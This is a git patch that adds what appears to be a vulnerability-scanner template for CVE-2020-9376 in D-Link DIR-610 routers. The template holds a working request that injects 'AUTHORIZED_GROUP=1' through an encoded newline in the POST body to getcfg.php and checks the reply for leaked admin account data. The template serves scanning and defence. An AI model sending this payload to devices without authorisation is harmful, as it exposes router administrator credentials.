From d8fc0079d96829b0759a19e791ee4b03bba4e5b0 Mon Sep 17 00:00:00 2001 From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Tue, 12 Jan 2021 21:45:12 +0530 Subject: [PATCH] Adding CVE-2020-9376 --- cves/2020/CVE-2020-9376.yaml | 35 +++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 cves/2020/CVE-2020-9376.yaml diff --git a/cves/2020/CVE-2020-9376.yaml b/cves/2020/CVE-2020-9376.yaml new file mode 100644 index 0000000000..7d671b3333 --- /dev/null +++ b/cves/2020/CVE-2020-9376.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-9376 + +info: + name: D-Link Information Disclosure via getcfg.php + author: whynotke + severity: high + description: | + D-Link DIR-610 devices allow Information Disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php. + NOTE: This vulnerability only affects products that are no longer supported by the maintainer. + + References: + - https://nvd.nist.gov/vuln/detail/CVE-2020-9376 + +requests: + - method: POST + path: + - "{{BaseURL}}/getcfg.php" + + body: SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1 + headers: + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Admin" + - "" + - "" + condition: and + part: body